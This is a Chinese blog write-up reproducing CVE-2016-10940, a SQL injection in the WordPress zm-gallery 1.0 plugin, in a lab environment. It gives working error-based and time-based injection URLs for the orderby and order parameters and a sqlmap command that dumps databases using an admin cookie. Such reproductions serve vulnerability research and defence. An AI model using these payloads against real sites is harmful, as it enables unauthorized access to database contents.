WordPress zm-gallery插件SQL注入漏洞(CVE-2016-10940)

这篇文章揭示了WordPresszm-gallery插件1.0版本中的SQL注入漏洞,攻击者可以利用order和orderby参数执行非法SQL命令,可能导致数据库敏感信息泄露。厂商尚未发布官方修复,用户应密切关注官方更新以保护网站安全。
摘要由CSDN通过智能技术生成

简介

WordPress是WordPress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress zm-gallery插件1.0版本中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。

影响版本

WordPress zm-gallery 1.0

复现过程

使用https://github.com/cckuailong/reapoc/tree/main/2016/CVE-2016-10940/vultarget 漏洞环境,搭建完成后如下所示:
首先需要admin用户登录

在这里插入图片描述

Poc如下,漏洞点在order参数和orderby参数上

http://ip/wp-admin/admin.php?page=zm_gallery&orderby=name&order=desc,EXTRACTVALUE(4626,CONCAT(0x5c,0x7162627871,(SELECT (ELT(4626=4626,1))),0x7171627871))
http://ip/wp-admin/admin.php?page=zm_gallery&orderby=name AND (SELECT 6604 FROM (SELECT(SLEEP(5)))crSa)&order=desc

或者使用sqlmap一把梭:(需要admin用户的cookie)

python sqlmap.py -u "http://ip/wp-admin/admin.php?page=zm_gallery&orderby=name&order=desc" --dbs --cookie="cookie of admin user" --level=5 --dbms=mysql

在这里插入图片描述

风险危害

获取数据库敏感信息

处置建议

目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法:https://wordpress.org/plugins/zm-gallery/

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值